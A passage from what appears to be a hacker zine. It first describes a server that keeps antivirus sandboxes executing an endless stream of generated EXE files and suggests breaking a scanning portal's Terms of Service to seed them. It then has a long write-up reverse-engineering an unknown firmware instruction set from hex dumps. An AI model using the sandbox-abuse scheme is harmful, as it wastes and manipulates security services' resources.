2. Path - the part between hostname and the filename I use to encode some
of the requested information, including process chain length counter,
free and total RAM amounts, and the flow identifier allowing me to trace
EXEs coming to sandboxes directly or indirectly, etc.
3. Referer - allowing me to precisely identify chains, but easy to be
manipulated.
I am also using my own User-Agent (providing some useful information as
well), but it is manipulated too often to use it as reliable channel. Out of
typical ways of HTTP communication I am not using anything other than GET
and I am not using queries in the URL as mentioned above. If I have a full
control over my query, picking less obvious channels seems more tempting.
Allowing my solution to run in the wild quickly made me aware of limited
performance at the server side. Even if a single request can be served in
less than 100ms, the number of requests quickly raises to levels I cannot
afford on my 4 core D-1521 with 32GB of RAM. To make it work better, the
following optimizations were implemented:
- Switch from CGI to ISAPI and from tcc.exe to libtcc.dll to minimize
number of processes required per request
- Source code header files optimization, allowing me to compile ~25kLoC
instead of ~120kLoC
- Dynamic slowdown on the client side, activated by timeouts or other
errors and repeating failed actions but slower
- Pre-compiled "failback" files to be served statically from my server if
compilation did not end in the defined time, which could happen when
queues grow very large
- Reverse proxy taking care of simple requests not requiring compiler
infrastructure.
Optimizations gave me a chance to provide 5x more valid responses from the
same hardware, which seems to be a nice result. Just to mention one thing
more: bandwidth is not an issue at all. Each EXE file is 11-13kB depending
on randomization, which keeps my WAN lazy, going mostly under 10Mbps.
If for any reason I would need more power, the entire solution easily scales
by adding additional A records to the DNS, effectively providing a round
robin. Of course, some reverse proxies, WAFs, or load balancers may be used
as well.
Effectively, I am serving about 4-5M of fresh EXE files each day, having
"proof of life" from 20k IP addresses constantly executing my code and
waiting for new commands to be issued. Some sandboxes run for longer time,
some drops the execution quickly, but new executions, not being a result of
a process chain are responsible for only about 10% of traffic.
I believe it’s clear how I keep sandboxes busy. The common question though
is how to feed them for the first time. It depends if you are in hurry or
not. If not, just link your first EXE somewhere. It will be picked up sooner
or later and then spread across sandboxes. If you need to see effects
quickly, some violation of Terms of Service of the popular portal spreading
files between different AV engines may be required. If you upload your EXE
there, sandboxes will care about it within a few minutes.
When you need to stop, no worries. Even if some server address is totally
dead for 6 months and you turn it back on, bots will do their job and you
will see requests coming very soon.
References:
[1] https://cloud.google.com/blog/topics/threat-intelligence/
tracking-malware-import-hashing/
[2] http://www.ciphersbyritter.com/NEWS4/RANDC.HTM
The source code of ISAPI and Client can be seen at
https://github.com/gtworek/PSBits/tree/master/TrollAV
A snapshot of the code is embedded at the end of this linenoise article.
|=-----------------------------------------------------------------------=|
|=-=[ 6 - Learning an ISA by force of will ]=----------------------------=|
|=-----------------------------------------------------------------------=|
by iximeow
cpu instruction sets are one of my special interests. Catherine 'whitequark'
posted about a weird instruction set. so of course i asked for a copy of the
binary. it indulged me! it's called noes, who knows why.
> ls -al noes
-rw-rw-r-- 1 iximeow iximeow 12935 May 23 18:12 noes
so, 12.6KiB of some firmware for a headset or something, and an otherwise
unknown instruction set. this is catnip, to me.
and so here is where i started:
00000000: bc60 bb68 e4e3 e5ed e28f e301 2842 9903 .`.h........(B..
00000010: 4391 05d4 c4bc 69bb bc26 bee0 04c8 41f0 C.....i..&....A.
00000020: e044 c840 f0e0 bbc8 51f0 e094 c850 f0ec .D.@....Q....P..
00000030: e3ed bfd8 0ebc e005 bfd0 0ec8 e3ed cc19 ................
00000040: b9e0 04c8 41f0 e064 c840 f0e0 bbc8 51f0 ....A..d.@....Q.
00000050: e077 c850 f0bc 4704 e001 d2e0 72c8 43f0 .w.P..G.....r.C.
00000060: e0bc c842 f0e0 bbc8 53f0 e0d3 c852 f0e4 ...B....S....R..
00000070: 01bf 9075 bce9 72e8 99b7 9003 bce9 72e2 ...u..r.......r.
00000080: 1ce3 00e0 72c8 43f0 e0e7 c842 f0e0 bbc8 ....r.C....B....
00000090: 53f0 e0b4 c852 f0bc c072 e013 c820 b5e0 S....R...r... ..
000000a0: ecc8 1fb5 bc59 40e1 08e8 48b6 7990 0a28 .....Y@...H.y..(
000000b0: c84c b6c8 4bb6 bc3c 6be8 48b6 9007 c84c .L..K..<k.H....L
000000c0: b628 c84b b6bc bd6b bce4 61e0 127a 284b .(.K...k..a..z(K
000000d0: 9904 e012 9007 1471 e841 b559 49c8 41b5 .......q.A.YI.A.
000000e0: e100 c942 b500 00bc a257 bfd0 0ec8 c2b9 ...B.....W......
000000f0: ccc1 b9ca c3b9 e8f9 b422 9803 bc2d 33bc ........."...-3.
00000100: da32 8612 76e8 0bb4 7e99 0476 bc75 bce9 .2..v...~..v.u..
00000110: 0cb4 1679 9903 ee0c b4e9 0cb4 1659 4976 ...y.........YIv
i also often think about the lovely writeup[1] from Robert Xiao on a similar
problem presented as a Dragon CTF teaser challenge a few years ago. working
from an unknown data encoding all the way out to an instruction set and high
level behavior is certainly possible, but it's not an opportunity that comes
up often. it sounds fun! so i decided to chew on noes with as little context
as i could have - the opportunity doesn't come up too often!
making heads or tails of the binary turned out to be quite a few words,
which i've roughly broken up as:
- which way is up?
- one instruction, to many instructions
- a virtuous cycle
- control flow!!
- loads and stores!!
- it does, in fact, have an ALU
- inc and dec are a loop's best friend
- more subtle loads or stores?
- a multiplier!
- what's left?
- whittling down the last few opcodes...
- 48..4f
- 59 ... or a wild guess towards 58..5f?
- 60..67 ... where possible
- ba
- 00..07
- mostly done, what's left in the encoding space?
- 78..7f ... sub or cmp?
- what is a0?
- what are c0..c7?
- but wait! what happened with jcc?
- last thoughts
- conclusion
- summarized materials
--[ which way is up?
even just at the bottom of this first window it's clear there's some kind of
structure to this thing. but if it's code or data, who knows. i did luck out
that the terminal size i happened to open noes with showed some structure,
otherwise i'd have resorted to the same age-old trick of "resize the window
until it looks right".
so there's some structure, the file is kind of tiny, the file is notionally
a firmware for a processor, so presumably the processor also is kind of
tiny. the bytes here are not obviously an 8080/6502/etc. probably not a
tiny ARM core, because the repetition at the end of the above is offset
by 1: this processor must be OK with instructions at odd addresses.
scrolling through the file for anything else interesting and this stands out:
00001358: bc60 bb68 e4e3 e5ed e28f e301 2842 9903 .`.h........(B..
00001368: 4391 05d4 c4bc 69bb bc26 bee0 04c8 41f0 C.....i..&....A.
00001378: e044 c840 f0e0 bbc8 51f0 e094 c850 f0ec .D.@....Q....P..
00001388: e3ed bfd8 0ebc e005 bfd0 0ec8 e3ed cc19 ................
00001398: b9e0 04c8 41f0 e064 c840 f0e0 bbc8 51f0 ....A..d.@....Q.
000013a8: e077 c850 f0bc 4704 e001 d2e0 72c8 43f0 .w.P..G.....r.C.
000013b8: e0bc c842 f0e0 bbc8 53f0 e0d3 c852 f0e4 ...B....S....R..
000013c8: 01bf 9075 bce9 72e8 99b7 9003 bce9 72e2 ...u..r.......r.
000013d8: 1ce3 00e0 72c8 43f0 e0e7 c842 f0e0 bbc8 ....r.C....B....
000013e8: 53f0 e0b4 c852 f0bc c072 e013 c820 b5e0 S....R...r... ..
000013f8: ecc8 1fb5 bc59 40e1 08e8 48b6 7990 0a28 .....Y@...H.y..(
this is different, which makes it interesting! this is a long span of bytes
with very few ascii bytes, unlike the rest of the file which has a more
frequent mix of bytes in [0, 255]. the content starts with an increasing
series, 80 81 82 83 84 85 E8 E6 B0 80 E8 E7 B0 80 ..., and towards the end
has 8D 8C 8B 8A 89 88. this might be data? maybe a lookup table?
there are other regions of clear structure, like:
00002478: 6af1 ed6b f112 e96c f121 7213 e96d f121 j..k...l.!r..m.!
00002488: 7314 e96e f121 7415 e96f f121 7512 e925 s..n.!t..o.!u..%
00002498: ee21 7213 e926 ee21 7314 e927 ee21 7415 .!r..&.!s..'.!t.
000024a8: e928 ee21 75ca 68f1 cb69 f1cc 6af1 cd6b .(.!u.h..i..j..k
000024b8: f112 1b1c 1d98 07e4 a4e5 debc 98df b9e4 ................
000024c8: 6de5 dfbc 98df bf10 6fe0 08c8 10f3 bf2f m.......o....../
but what does 21 72 13 E9 mean? or 21 73 14 E9? 21 74 15 E9? maybe four-byte
instructions with different operands?
ok. time to break out the big tools.
# iximeow> xxd -ps noes | head -n 20
bc60bb68e4e3e5ede28fe30128429903439105d4c4bc69bbbc26bee004c8
41f0e044c840f0e0bbc851f0e094c850f0ece3edbfd80ebce005bfd00ec8
e3edcc19b9e004c841f0e064c840f0e0bbc851f0e077c850f0bc4704e001
d2e072c843f0e0bcc842f0e0bbc853f0e0d3c852f0e401bf9075bce972e8
99b79003bce972e21ce300e072c843f0e0e7c842f0e0bbc853f0e0b4c852
f0bcc072e013c820b5e0ecc81fb5bc5940e108e848b679900a28c84cb6c8
4bb6bc3c6be848b69007c84cb628c84bb6bcbd6bbce461e0127a284b9904
e01290071471e841b55949c841b5e100c942b50000bca257bfd00ec8c2b9
ccc1b9cac3b9e8f9b4229803bc2d33bcda32861276e80bb47e990476bc75
bce90cb416799903ee0cb4e90cb416594976ea0cb4e300e80bb4e100594a
72114b7383821672e300fc0881e1ff518980e0ff097188bfecac8a8bbf9d
acc9ddeec8dcee8eb9e701bc2d2e86e1ffe8edb4799044bf523276901de0
54c857f3e019c856f328c853f300c852f371e850f319c850f3bc01bd1674
bfb628719819e1fee850f321c850f328c8edb4e008c853f328c852f3bf87
308eb9e200e004c841f0e044c840f0e0bbc851f0e094c850f0e101121972
e072c843f0e0bcc842f0e0bbc853f0e0d3c852f0e102121972e040c845f0
e050c844f0e0bbc855f0e0f6c854f0e104121972e06ac847f0e05ec846f0
e0bcc857f0e003c856f0e108121972e061c849f0e0e1c848f0e0bcc859f0
e024c858f0e110121972e057c84bf0e089c84af0e0bcc85bf0e027c85af0
e120121972e032c84df0e0c8c84cf0e0bcc85df0e046c85cf0e140121972
more structure to this, highlighting helps..
308eb9e200e004c841f0e044c840f0e0bbc851f0e094c850f0e101121972
^^ ^^ ^^ ^^
e072c843f0e0bcc842f0e0bbc853f0e0d3c852f0e102121972e040c845f0
^^ ^^ ^^ ^^ ^^
e050c844f0e0bbc855f0e0f6c854f0e104121972e06ac847f0e05ec846f0
^^ ^^ ^^ ^^ ^^
e0bcc857f0e003c856f0e108121972e061c849f0e0e1c848f0e0bcc859f0
^^ ^^ ^^ ^^ ^^
e024c858f0e110121972e057c84bf0e089c84af0e0bcc85bf0e027c85af0
^^ ^^ ^^ ^^ ^^
e120121972e032c84df0e0c8c84cf0e0bcc85df0e046c85cf0e140121972
^^ ^^^^ ^^ ^^
if c8 marks the start of some instruction or sequence, then those
sequences are something like:
c841f0e044 c840f0e0bb c851f0e094 c850f0e101 ...
... c843f0e0bc c842f0e0bb c853f0e0d3 c852f0e1 ...
and so seeing 41f0, 40f0, 51f0, 50f0, 43f0, 42f0, 53f0, 52f0, and others
like it, immediately suggests something little-endian is happening. those
might be offsets for a memory access? e044, e0bb, etc could be other
immediates or operand selectors. maybe c8 is an opcode itself?
this is a great start: there's some kind of structure, something that looks
like a workable guess for how at least one instruction is structured, values
that look like addresses - or at least relative offsets. even if this is
more data than code, there's enough structure here to chew on and learn
more about the firmware.
--[ one instruction, to many instructions
if i were stumped at this point i'd have started looking for common byte
sequences, working through a list to guess what might be function prologues
or epilogues, and go from there. but, being neither stumped nor interested
in switching away from the next most advanced tool i have on hand -
`xxd -ps noes | vim -` - i stuck with eyeballing common bytes.
8e stuck out:
75bffce2fe0671fe0272fe0373f219d28e8fb98786ca56ef147615771674
^^
1775bffce2ea56eff674bfe4448e8fb9878628c857eec856eee412bf14e9
^^
761177e010de03e20016741775bf5f058e8fb9e8e9ed9803bccfe2e85aee
^^ ^^
e95bee19982de855eec84befc94defe85aeec84cefe268e3eee461e5eebf
^^
dfe3ea5aeeeb5beefa079026c85beec85aeebcc0e3e854eec84befe859ee
c84defe858eec84cefe268e3eee461e5eebfdfe3e001c84befe85deec84d
^^ ^^
and in fact the longer common sequences are 8e8fb98786:
75bffce2fe0671fe0272fe0373f219d28e8fb98786ca56ef147615771674
^^^^^^^^^^
1775bffce2ea56eff674bfe4448e8fb9878628c857eec856eee412bf14e9
^^^^^^^^^^
761177e010de03e20016741775bf5f058e8fb9e8e9ed9803bccfe2e85aee
e95bee19982de855eec84befc94defe85aeec84cefe268e3eee461e5eebf
dfe3ea5aeeeb5beefa079026c85beec85aeebcc0e3e854eec84befe859ee
c84defe858eec84cefe268e3eee461e5eebfdfe3e001c84befe85deec84d
this shows up across the file, but 8786 is only sometimes present. so maybe
this is the epilogue of one function, and the prologue of the next? in which
case the epilogue would be 8e8fb9 and the prologue is 8786. then b9 is ret?
8e8f and 8786 are pop and push respectively? lets see if that gives us
reasonably-sized functions. as some examples:
... 8e8fb9
^^^^^^
8786cae5eecce6eee412bf14e9761177e8e6eede03e8e5eede04e20016741775bf5f058e8fb9
^^^^^^
e200e45390d4b9e4f5e5edbf82c3e0d4c85cefe0e8c85bef28c85eefe003
[ 210 bytes ]
bf2bd78e8fb9
^^^^^^
e500e406e260e3ed14e1005272110b73f27215527504e118
[ 240 bytes ]
19e0f2c8ecee177116c0c9eeeec8edeee1fff65172e412bf4bd48e8fb9
cc86f2cd87f2e004c882f2b928c855f3e01ac854f3e1fee850f321c850f3e0
[ 420 bytes ]
75bf8cdaea0aef02ca0aefe199127991818e8fb9
^^^^^^
nothing huge, seems like a workable assumption.
--[ a virtuous cycle
with a guess of function prologues and epilogues, i can guess at the
instructions around the entry/exit of these "theorized functions".
some more looking around, c8 is pretty common and seems to be followed by
two bytes that might be an address?
52e8ec76edbfdee6e876ed9805e401bc52e8b928c806eec805eec847eee8
^^ ^^ ^^
03f3619016e003c84beee001c84aeee140e8a3f919c8a3f9bc3b60e102e8
^^
4aee799026e003c84beee8eded9805e008c803f3e008c88cf971e898f919
^^ ^^ ^^
c898f9e1bfe8a3f921c8a3f9b9e010c803f3bf9f5ce108e898f919c898f9
^^ ^^ ^^ ^^
e1bfe8a3f921c8a3f9e001c846eeb98786e101e847ee79902c28c847eee4
^^ ^^ ^^
05e5eebf82c3e0c8c852b9e071c851b9e001c854b9e0f4c853b9e201e400
^^^^ ^^ ^^ ^^
bf9513c906eec805eee102e8e6ed799003bf2dc2e2cce342e85bede95ced
^^
there are definitely other c8s here that don't make sense yet, but
06ee .. 05ee and 4bee .. 4aee look like sequential addresses, and 03f3 shows
up a few times which suggests these addresses are probably absolute.
in-between there are several e0 followed by a relatively low byte, e001
between two c8 sequences, e008, e010, an e071 once. the second byte might
be an immediate, maybe an offset? the values tend towards bitmasks, for
whatever reason. this also happens with e1 and an e2 in the same region:
52e8ec76edbfdee6e876ed9805e401bc52e8b928c806eec805eec847eee8
03f3619016e003c84beee001c84aeee140e8a3f919c8a3f9bc3b60e102e8
4aee799026e003c84beee8eded9805e008c803f3e008c88cf971e898f919
c898f9e1bfe8a3f921c8a3f9b9e010c803f3bf9f5ce108e898f919c898f9
e1bfe8a3f921c8a3f9e001c846eeb98786e101e847ee79902c28c847eee4
05e5eebf82c3e0c8c852b9e071c851b9e001c854b9e0f4c853b9e201e400
^^^^
bf9513c906eec805eee102e8e6ed799003bf2dc2e2cce342e85bede95ced
^^^^
so maybe eX is a whole range of instructions with one-byte immediates?
with this, lets see how a hypothesized function breaks apart..
87 86
14761577f698 19e0f2
c8ecee 177116c0 c9eeee c8edee e1ff f65172 e412 bf4bd4
8e 8f b9
7X is another one-byte instruction maybe? 1X too? calling 86 "push A" and
87 "push B", similarly with 8e 8f, that gives us:
87 86 ; push B; push A
14 76 15 77 f698 19e0f2
c8ecee 17 71 16 c0 c9eeee c8edee e1ff f651 72 e412 bf4bd4
8e 8f b9 ; pop A; pop B; ret
checking that other blocks seem to break apart reasonably as "functions",
this is how vim starts to look. knowing c8XXXX is an instruction, in turn,
makes other instructions more clear:
87 86
28 c809ef ; 28 looks like something
72 e461 e5ee bf29e3 ; 72 looks like something, bf?
e200 e468 e5ee bf29e3 bf2ae0 bffedc ; bf?
28 76 77 e84cee e94dee e201a
6939384290fac923f5c822f5e101e826f519c826f5c981f1e850f1649806 ; dunno
28c878ed9818e803f3619807e001c809ef900bc6e1081679e107174991bc ; about
bf4fdde826f56090fabf33e1e0072f9008e0082e9003bf2dc2e809ef9803 ; these
bf2bd7
8e 8f b9 ; but an epilogue
lots that would be too early to guess about, but 28 seems like a functional
instruction, as does 72. bf might be a relative load or store?
if this is a vaguely normal 8-bit CPU, there ought to be conditional relative
branches around somewhere too, which can help point towards instruction
boundaries. most relative branches are short, either in the positive or
negative direction (for loops), so that's worth keeping in mind. keeping
an eye out is the best option, not really sure how to proactively find them.
at the very least, it's probably not e0..e7 as the conditional branches,
because the following byte is sometimes ff (branch $-1??) or 00 (branch $???)
looking at more code with the new guess that b9 is the end of a function,
this region is informative:
... snip ...
b9
; new function?
e500 e406 e260 e3ed 14 e100 52 72 ; 14, 52, also 72 instructions?
110b 73f2 7215 52 7504 e118 ; not sure if this makes sense
14 79 91e8 15
b9 ; ret
; new function?
28 c83bb5 e0fc c83cb5 28 c83db5 c83eb5 c842b5 e017 c841b5
e0ed c840b5 e061 c83fb5 bfded5 c865ed bf314d 71 9003 e006 b9
28 b9 ; something, ret
; new prologue
86 ...more...
28 b9 seems too short to be a function (why call to 28? if you want 28 just
inline it), so that's noteworthy. but 9003 is 3 bytes before it. 9003 as a
jz $+3? and 28 b9 is an alternate ret? that skips over e006; ret? seems
workable.
so 90XX as conditional branch... here's a function where early on i guessed
instructions' start and end offsets based on vibes, and gotten a few details
quite wrong:
87 86
cc27efcd28ef28 c8f1b0 e002 c863ef e05a c862ef
cd65ef 14 cc64ef e201 e400 bf83e9 76 11 77 71 16 19
90 03 bf420b e8f1b0 ; 9003 is one instruction, not two
98fb
8e 8f b9
fixing that up with what i know now it looks more like...
87 86
cc27efcd28ef28 c8f1b0 e002 c863ef e05a c862ef
cd65ef 14 cc64ef
e201 e400 bf83e9 76 11 77 71 16 19
9003 bf420b ; jCC $+3
e8f1b0
98fb ; is this jCC $-5?
8e 8f b9
so maybe 9X is a whole family of conditional branches? plausible...
e008 c803f3 bf52d8 28 c8e6ed c8eeed
8eb9e8eded
9001 ; hadn't noticed this 9001 at first. conditional branch over a ret?
b9 28 c8eeed c8eded
e4f1 e5ed bf82c3 bffedc bf106f
adjusting that a bit:
e008 c803f3 bf52d8 28 c8e6ed c8eeed
8eb9e8eded
9001 b9
28 c8eeed c8eded
e4f1 e5ed bf82c3 bffedc bf106f
finding other interesting patterns around 9Xs, this function:
87 86 15 71 14 e304 53 9101 0176 ; 91XX as jCC?
1177 e101 fe01 79 e104 f679 9034 e102 fe01
79 9006 bf3cd5bccdc7e101fe01 ; 79 is a test or cmp or sub maybe?
79 9803 bccdc7e1f7e854f121c854f1e400bffa48e1fde856f121c856f1bf
17d5bccdc7e110f6799034e850f164986c e101 fe01
79 900f e401 bf67c5
e200 e41f bf2b31 bccdc7 e102 fe01 79 904f
e200 e423 bf2b31 e850f1 62 983d e400 983b e102 f679 90 38
e850f1 64 9832 fe01 79 9018 e108 e854f1 19 c854f1
e401 bf67c5 e852f1 60 9819 e400 9812 e101 fe01
79 900e e1f7 e854f1 21 c854f1
e401 bf67c5
8e8fb9
following offsets for the proposed jCC in the third and fourth lines yields:
79 9006 bf3cd5bccdc7 e101 fe01 ; so fe01 is something (`feXX`?)
79 9803 bccdc7 e1f7 e854f1 21 c854f1 e400 ; bcXXXX (or more?) is something
bffa48e1fde856f121c856f1bf
incidentally in the literal next function that knowledge of bf breaks things
up into another pattern,
86
e406 bf551b 76 980b e406 bf551b 76 9803 bf420b e406
bf8f4d 71 9003 bf420b e0ee c840b5 e0f3 c83fb5 28 c842b5 e016 c841b5
bf114d 71 9003 bf420b e812b1 e913b1 ea14b1 eb15b1
ecfcee 7c 9012 e8fdee 79900c
e8feee 7a 9006
e8ffee 7b 9803 bf420b e80db1 e90eb1 ea0fb1 eb10b1
ec05ef 7c 9012
e806ef 79 900c
e807ef 7a 9006
e808ef 7b 9803
bf420b 8eb9e400bf
this is great; 7x definitely seems like it generates some kind of branch
condition, and 9xXX seems like a conditional branch based on that result.
--[ control flow!!
from this point onward, i'll be marking up approximate level of nesting with
indentation. for each branch over a byte of code, it will be indented an
additional level. when the branch target is reached, unindent. for simple
control flow this gives a general idea of how PC moves through a region.
revisiting the above with this additional structure is immediately informative!
86
e406 bf551b ; this and 76 after are the same as the one two lines down
76 980b
e406 ; doing something to r4? getting a condition out?
bf551b ; does bf551b reference memory?
76 9803
bf420b
e406 bf8f4d
71 9003
bf420b
e0ee c840b5
e0f3 c83fb5 28 c842b5
e016 c841b5
bf114d 71 9003
bf420b
e812b1 e913b1 ea14b1 eb15b1 ecfcee
7c 9012
e8fdee
79 900c
e8feee
7a 9006
e8ffee
7b 9803
bf420b
e80db1 e90eb1 ea0fb1 eb10b1 ec05ef
7c 9012
e806ef
79 900c
e807ef
7a 9006
e808ef
7b 9803
bf420b
; note 8e b9 here, some kind of early ret?
; missed that at first!
8eb9 e400bf
52e8ec76edbfdee6e876ed9805e401bc52e8b928c806eec805eec847eee8
03f3619016e003c84beee001c84aeee140e8a3f919c8a3f9bc3b60e102e8
4aee799026e003c84beee8eded9805e008c803f3e008c88cf971e898f919
c898f9e1bfe8a3f921c8a3f9b9e010c803f3bf9f5ce108e898f919c898f9
e1bfe8a3f921c8a3f9e001c846ee
b9
reconsidering other lines, there's this from early on which is not obviously
wrong but now clearly has an error:
79 9009 fe07 72 fe08 73 e015 d216 74 17 75 bfead9 bc3bdb 16 74 17 75 bfe605
^ ^
$+9 is an instruction is $+9, the split was wrong
so this should be
79 9009 fe07 72 fe08 73 e015 d2 16 74 17 75 bfead9 bc3bdb 16 74 17 75 bfe605
^ ^
$+9 is an instruction is $+9d
16 is an instruction on its own, and so is d2.
back to looking for interesting structures, and here's part of a larger
function:
e108
e8d5ee
79 9113
e1f8 51 72 e8d6ee e100
9802 ; jump forward to 42..
50 31 42
99fb ; jump backwards to 50..
bc45eb
e9d5ee e008 59 49 71 e8d6ee bc40eb 69 38 41 99fb e100 76 11 77 e9d7ee
16 79 e9d8ee 17 49
9959
so there's a short loop, the loop's body is 50 31 42, and some condition
means the loop is entered skipping 50 31.
different topic for a moment, there are lots of e8XXXX/c8XXXX. what's going
on with that? something to orient with...
87 86
28
c8f4b0
bf03bd
e013 c820b5
e0ec c81fb5
bfbfe6
e0ce c8c2b4
e0af c8c1b4
e434 bf8f4d
71 9003
bc87c0
e83bb5 c807ee ; the immediates here are interesting actually
e83cb5 c808ee ; incrementing by 1
e83db5 c809ee ; on the first and second instruction
e83eb5 c80aee ; 0xb53e, 0xee0a ?
bf2fd6
bfdcdb
bfc62e
e101 799803bc38c0e803f3609809e841b6e942b6
--[ loads and stores!!
e8 XXXX is probably a load! then c8 XXXX is a store! might be an absolute
16b address then? does that suggest e0 is a relative load? maybe some kind
of banked load.
seems like c9 is also a store, probably all c8-cf and e8-ef are store/load?
bf8ac0 e1fe e850f3 21 c850f3
b9 28 c8feed c8fded 72 e449 bcc2d4
e829b4 c863ef ; another 32b copy
e828b4 c862ef
e825b4 c865ef
e824b4 c864ef
e200 e400
bf83e9
c9f2ed c8f1ed e8f1ed e9f2ed ; [edf2]->r1; [edf1]->r0;
; r0->[edf1]; r1->[edf2]? this is wrong
bc8ad9
e40e
bf4204
c929b4 c828b4 ; again, storing and then loading later?
e00d
ea28b4 eb29b4 ; but ea/eb would be r4, r5 maybe
elsewhere is another interesting sequence, annotating by the theory so far,
e1bf ; r1<-[...0xbf]
e823f2 ; r0<-[0xf223]
21 ; ???
c823f2 ; [0xf223]<-r0
this is great: control flow, loads/stores, this is enough to start finding
where registers are read and written, and start figuring out arithmetic or
other operations.
--[ it does, in fact, have an ALU
so 21 is maybe, op r0, r1? 21 can't encode two registers (would be
001y yzzz? not enough space to say r4, r5 here). so might be an implicit r0.
28 is a different op2 r0, r0? consider
e803f3 ; r0<-[0xf303]
60 9009 ; also 60: generates a status from r0?
28 ; definitely an instruction
c83dee ; [0xee3d]<-r0
e001 ; r0<-[..0x01]
c85aed ; [0xed5a]<-r0
bfd547
71
98fa
28 might be xor r0, r0, it's often precedes a c8 store:
87 86
28 c8f4b0 ; xor r0, r0 (?); [0xb0f4]<-r0
bf03bd
e013 c820b5
... ...
b9 ; ret
28 ; first instruction in the block? function?
c8feed c8fded ; [0xedfe]<-r0; [0xedfd]<-r0
72 e449 bcc2d4 ; op r0, r2; r4<-[..0x49]; ??
e829b4 c863ef
e828b4 c862ef
e825b4 c865ef
e824b4 c864ef
78 is not present as an instruction it seems, 79 is?
bfc62e ; unknown
e101 ; r1<-[..0x01]
79 9803 ; op r0, r1?; jCC $+3
bc38c0 ; unknown
e803f3 ; r0<-[0xf303]
7a is a single-byte instruction, as is 74 and b4:
29 4c 912d
ea5bed eb5ced ; r2<-[0xed5b]; r3<-[0xed5c]
e048 e120 ; r0<-[..0x48]; r1<-[..0x20]
7a e080 2b ; 28 seems like xor r0, r0, so 2b is xor r0, r3?
74 e080 29 ; 29 as xor r0, r1?
4c 9118
e850f1
64 9012
bf2bd7
28 c810f2 c885f2 c884f2
74 75 bf03d7
bfc62e e101
79 981b
e10f e8b0b4
79 9009
e8b1 b4 62 9803 61 900a
fishing around to find more about the 1X and 2X opcodes, this region is
interesting:
62 9811
e108 e854f1 ; r1<-[..0x08]; r0<-[0xf154]
19 ; op r0, r1? ;
c854f1 ; [0xf154]<-r0; maybe 0001_1xxx is add?
e852f1 ; r0<-[0xf152]
60 ; something on r0 producing a condition..
9802
e600 ; 1110_0xxx yyyyyyyy may be "load imm8 into rX"
16 ;
74 bf67c5
; the sequence here is eventful
e18f ; r1<-0x8f
e825f2 ; r0<-[0xf225]
21 ; op r0, r1
e170 ; r1<-0x70
19 ; op r0, r1
c825f2 ; [0xf225]<-r0
e008 c803f3 bf52d8
28 c8e6ed c8eeed
some evidence that 21 may be the and instruction in particular, rather than
add or sub:
e1bf ; r1<-0xbf
e823f2 ; r0<-[0xf223]
21 ; op r0, r1
; if op were add, presumably there is a sub, why not sub 0x40?
c823f2 ; [0xf223]<-r0 ; and masks bits, makes somewhat more sense...
`0xbf` as an immediate to `and` selects bits `1011_1111`. if this were `add`,
though, it would be an increment by 191 (not common) or a roundabout subtract
by 65 (perhaps less common?). so, `and` it is!
is 78..7f is cmp/test/sub r0, rN:
e812b1 e913b1 ea14b1 eb15b1
ecfcee
7c 9012 ; is [0xeefc] == [0xb112]?
e8fdee
79 900c ; is [0xeefd] == [0xb113]?
e8feee
7a 9006 ; is [0xeefe] == [0xb114]?
e8ffee
7b 9803 ; is [0xeeff] == [0xb115]?
bf420b
e80db1 e90eb1 ea0fb1 eb10b1
ec05ef
7c 9012 ; is the same for [0xb10d..0xb110] == [0xef05..0xef08]
e806ef
79 900c
e807ef
7a 9006
e808ef
7b 9803
bf420b
8e b9
notably 78 does not seem to appear as an instruction. preference for
xor r0, r0 (0x28)? or not sub?
at this point it's starting to be especially important to figure out which
operands an instruction reads or writes its operands, ones that are explicit
and can change instruction to instruction. spans like the following can help
make sense of what instructions feed data into ones that come later. trying it
on for size, it seems like [10..17] might be mov rX, r0, and maybe
[70..77] are sub r0, rN?
87 86 ; push r7; push r6
14 76 15 77 f698 ; mov r4, r0 ?; sub r0, r6 ?; mov r5, r0 ?; sub r0, r7 ?
19 e0f2 c8ecee ; add r0, r1 ?; r0<-0xf2; r0->[0xeeec]
17 ; mov r7, r0 ?; this is especially interesting..
71 ; maybe this subtracts from r1? or subtracts into r1?
16 ; mov r6, r0 ?
c0 ; ???
c9eeee ; why it would modify from r1, `[0xeeee]<-r1`
c8edee ; and `[0xeeed]<-r0`
e1ff f651
72 e412 bf4bd4
8e 8f b9
taking this very carefully: the function definitely wants to presersve r7 and
r6, so they are likely written here. something happens with r4 and r5?
but the 17 after storing to [0xeeec] is really useful! of the few
instructions between it and the 77 before it, none seem likely to interact
with r7:
* f698 - least known, but still unlikely to reference the 7th anything
* 19 - low instructions seem to be like XXXXX_YYY, so this is "op r1, r0"?
* e0f2 - pretty confident this only writes to r0
* c8ecee - pretty confident this only reads `r0` and writes to memory
so what's the point of 77 then, using register 7? if 17 reads register 7, then
77 probably wrote it. if 17 writes register 7, then 77 is probably a read - if
it was a write then it seems like it would be clobbered later unless one of
these instructions uses r7 implicitly.
worse: 77 is probably not writing to r0, so the initial guess of sub r0, r7
seems to really not fit. 19 probably modifies r0, from looking at other blocks
above, and its clobbered by e0f2 loading f2 into r0 anyway. all that really
seems to remain is that 77 probably reads r0 and probably writes r7, then that
76 does similar but to r6.
at this point it seems best to move on and chip at this block later. 19 above
is a mystery; what does it mean here?
c83bef ; [0xef3b]<-r0
c93cef ; [0xef3c]<-r1
ca3def ; [0xef3d]<-r2
cb3eef ; [0xef3e]<-r3
e825ee ; r0<-[0xee25]
e93bef ; r1<-[0xef3b]
19 c825ee ; op r0, r1; [0xee25]<-r0 ; 18..1f is likely not add, sub,
; could be adc/sbc, maybe `or`
e826ee ; r0<-[0xee26]
e93cef ; r0<-[0xef3c]
19 c826ee ; op r0, r1; [0xee26]<-r0 ; if 19 is `or`, this is computing
; OR of two 32 regions
e827ee ; r0<-[0xee27]
e93def ; r1<-[0xef3d]
19 c827ee ; op r0, r1; [0xee27]<-r0
e828ee ; r0<-[0xee28]
e93eef ; r1<-[0xef3f]
19 c828ee ; op r0, r1; [0xee28]<-r0
ea3bef ; r2<-[0xef3b] ; then .. something?
eb3cef ; r3<-[0xef3c]
ec3def ; r4<-[0xef3d]
ed3eef ; r5<-[0xef3e]
80 e837ef ; op; r0<-[0xef37]
2280 ; op r0, r2; op
e838ef ; r0<-[0xef38]
2373 ; op r0, r3; op r0, r3
e839ef ; r0<-[0xef39]
2474 ; op r0, r4; op r0, r4
e83aef ; r0<-[0xef3a]
2575 ; op r0, r5; op r0, r5
or this:
e876b4 ; r0<-[0xb476]
e977b4 ; r1<-[0xb476]
c8e6b0 ; [0xb0e6]<-r0
c9e7b0 ; [0xb0e7]<-r1
28 c8e8b0 ; [0xb0e8]<-0
